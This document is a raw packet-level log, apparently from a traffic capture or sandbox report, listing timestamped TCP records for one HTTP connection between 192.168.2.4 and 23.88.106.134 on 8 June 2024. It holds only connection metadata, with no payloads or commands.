Jun 8, 2024 20:22:05.135256052 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:05.135291100 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:05.135477066 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:05.135477066 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:05.135905027 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:05.135920048 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:05.135996103 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:05.136585951 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:05.136629105 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:05.136642933 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:05.136668921 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:05.136698008 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:05.137310028 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:05.137326002 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:05.137337923 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:05.137351990 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:05.137370110 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:05.137403965 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:05.137403965 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:05.138040066 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:05.138055086 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:05.138099909 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:05.138099909 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:05.138725996 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:05.138741970 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:05.138755083 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:05.138768911 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:05.138792038 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:05.138792038 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:05.138819933 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:05.139435053 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:05.139450073 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:05.139496088 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:05.139497042 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:05.140137911 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:05.140153885 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:05.140166044 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:05.140188932 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:05.140218019 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:05.140851021 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:05.140866041 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:05.140877962 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:05.140906096 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:05.140930891 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:05.141544104 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:05.141558886 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:05.141572952 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:05.141587019 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:05.141603947 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:05.141638041 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:05.141638041 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:05.260113001 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:05.260209084 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:05.260246038 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:05.260411024 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:05.260649920 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:05.260713100 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:05.260746956 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:05.260854006 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:05.260967970 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:05.261030912 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:05.261055946 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:05.261282921 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:05.261766911 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:05.261801958 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:05.261825085 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:05.261851072 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:05.262469053 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:05.262506008 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:05.262538910 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:05.262573957 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:05.263175011 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:05.263210058 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:05.263242006 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:05.263242960 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:05.263272047 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:05.263297081 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:05.263881922 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:05.263916016 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:05.263951063 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:05.263973951 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:05.263973951 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:05.263984919 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:05.264003992 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:05.264046907 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:05.264610052 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:05.264643908 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:05.264678955 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:05.264712095 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:05.265310049 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:05.265343904 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:05.265377045 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:05.265377045 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:05.265399933 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:05.265424013 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:05.266057968 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:05.266093016 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:05.266124964 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:05.266125917 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:05.266148090 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:05.266186953 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:05.266607046 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:05.266639948 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:05.266673088 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:05.266707897 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:05.266709089 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:05.266709089 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:05.266710043 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:05.266757011 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:05.267448902 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:05.267482042 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:05.267515898 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:05.267517090 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:05.267538071 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:05.267549992 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:05.267570019 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:05.267610073 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:05.268332958 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:05.268368006 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:05.268393993 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:05.268400908 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:05.268414974 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:05.268441916 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:05.268455982 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:05.268510103 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:05.269155979 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:05.269191027 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:05.269220114 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:05.269220114 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:05.269242048 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:05.269253969 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:05.269263983 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:05.269313097 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:05.270004034 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:05.270037889 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:05.270068884 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:05.270071030 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:05.270091057 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:05.270106077 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:05.270113945 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:05.270167112 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:05.270890951 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:05.270925045 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:05.270956993 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:05.270962954 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:05.270962954 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:05.270992994 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:05.271013021 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:05.271051884 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:05.271709919 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:05.271745920 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:05.271776915 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:05.271776915 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:05.271800041 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:05.271811008 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:05.271820068 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:05.271872997 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:05.272547007 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:05.272582054 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:05.272617102 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:05.272620916 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:05.272622108 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:05.272664070 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:05.384644032 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:05.384732008 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:05.384767056 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:05.384866953 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:05.384866953 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:05.385560989 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:05.385595083 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:05.385628939 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:05.385641098 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:05.385641098 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:05.385663986 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:05.385677099 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:05.385694027 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:05.385724068 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:05.385729074 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:05.385746002 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:05.385765076 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:05.385791063 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:05.385818005 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:05.386545897 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:05.386583090 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:05.386615038 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:05.386620045 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:05.386639118 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:05.386655092 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:05.386678934 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:05.386718035 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:05.387392044 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:05.387428045 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:05.387460947 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:05.387466908 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:05.387466908 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:05.387495041 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:05.387511969 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:05.387550116 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:05.388310909 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:05.388339996 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:05.388371944 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:05.388382912 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:05.388382912 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:05.388408899 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:05.388436079 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:05.388458014 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:05.389024019 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:05.389060020 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:05.389091015 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:05.389095068 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:05.389113903 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:05.389133930 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:05.389149904 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:05.389188051 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:05.389882088 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:05.389918089 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:05.389949083 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:05.389950991 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:05.389969110 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:05.389986992 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:05.390005112 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:05.390043020 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:05.390906096 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:05.390940905 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:05.390970945 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:05.390970945 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:05.390993118 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:05.391011953 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:05.391024113 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:05.391064882 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:05.391627073 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:05.391661882 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:05.391690969 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:05.391696930 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:05.391710997 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:05.391731024 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:05.391748905 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:05.391761065 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:05.391786098 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:05.391812086 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:05.392365932 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:05.392401934 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:05.392426014 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:05.392436028 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:05.392450094 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:05.392472982 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:05.392498970 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:05.392522097 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:05.392527103 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:05.392563105 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:05.393327951 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:05.393362999 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:05.393395901 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:05.393399954 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:05.393423080 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:05.393430948 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:05.393440962 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:05.393465996 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:05.393482924 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:05.393501997 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:05.393522978 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:05.393559933 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:05.394160986 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:05.394196987 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:05.394222021 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:05.394232988 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:05.394242048 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:05.394268990 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:05.394287109 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:05.394304037 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:05.394330978 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:05.394340038 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:05.394349098 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:05.394392014 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:05.395072937 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:05.395108938 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:05.395143986 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:05.395179033 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:05.395186901 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:05.395186901 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:05.395186901 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:05.395212889 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:05.395226002 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:05.395261049 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:05.396099091 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:05.396135092 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:05.396161079 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:05.396169901 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:05.396188974 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:05.396204948 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:05.396212101 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:05.396239042 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:05.396255970 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:05.396292925 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:05.396898985 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:05.396934032 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:05.396961927 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:05.396965027 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:05.396981955 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:05.396998882 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:05.397013903 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:05.397039890 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:05.397061110 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:05.397072077 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:05.397085905 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:05.397119999 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:05.397809982 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:05.397845030 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:05.397870064 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:05.397875071 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:05.397897005 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:05.397912025 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:05.397927999 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:05.397947073 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:05.397975922 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:05.397979975 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:05.398004055 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:05.398037910 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:05.398825884 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:05.398859978 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:05.398889065 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:05.398901939 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:05.398901939 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:05.398924112 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:05.398932934 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:05.398957968 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:05.398973942 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:05.399009943 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:05.399604082 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:05.399638891 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:05.399662018 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:05.399669886 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:05.399699926 CEST	49731	80	192.168.2.4	23.88.106.134
